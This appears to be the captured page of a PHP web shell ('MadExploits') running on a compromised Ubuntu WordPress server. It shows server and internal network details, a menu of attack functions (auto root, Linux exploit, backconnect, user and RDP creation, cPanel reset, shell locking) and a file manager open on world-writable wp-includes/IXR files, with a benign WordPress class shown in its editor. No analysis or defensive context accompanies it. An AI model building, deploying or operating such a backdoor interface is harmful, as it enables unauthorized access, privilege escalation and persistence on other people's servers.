Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
blog /
wp-includes /
IXR /
[ HOME SHELL ]
Name
Size
Permission
Action
class-IXR-base64.php
414
B
-rw-rw-rw-
class-IXR-client.php
4.53
KB
-rw-rw-rw-
class-IXR-clientmulticall.php
963
B
-rw-rw-rw-
class-IXR-date.php
1.64
KB
-rw-rw-rw-
class-IXR-error.php
854
B
-rw-rw-rw-
class-IXR-introspectionserver....
5.2
KB
-rw-rw-rw-
class-IXR-message.php
7.88
KB
-rw-rw-rw-
class-IXR-request.php
927
B
-rw-rw-rw-
class-IXR-server.php
6.77
KB
-rw-rw-rw-
class-IXR-value.php
3.7
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-IXR-error.php
<?php /** * IXR_Error * * @package IXR * @since 1.5.0 */ class IXR_Error { var $code; var $message; /** * PHP5 constructor. */ function __construct( $code, $message ) { $this->code = $code; $this->message = htmlspecialchars($message); } /** * PHP4 constructor. */ public function IXR_Error( $code, $message ) { self::__construct( $code, $message ); } function getXml() { $xml = <<<EOD <methodResponse> <fault> <value> <struct> <member> <name>faultCode</name> <value><int>{$this->code}</int></value> </member> <member> <name>faultString</name> <value><string>{$this->message}</string></value> </member> </struct> </value> </fault> </methodResponse> EOD; return $xml; } }
Close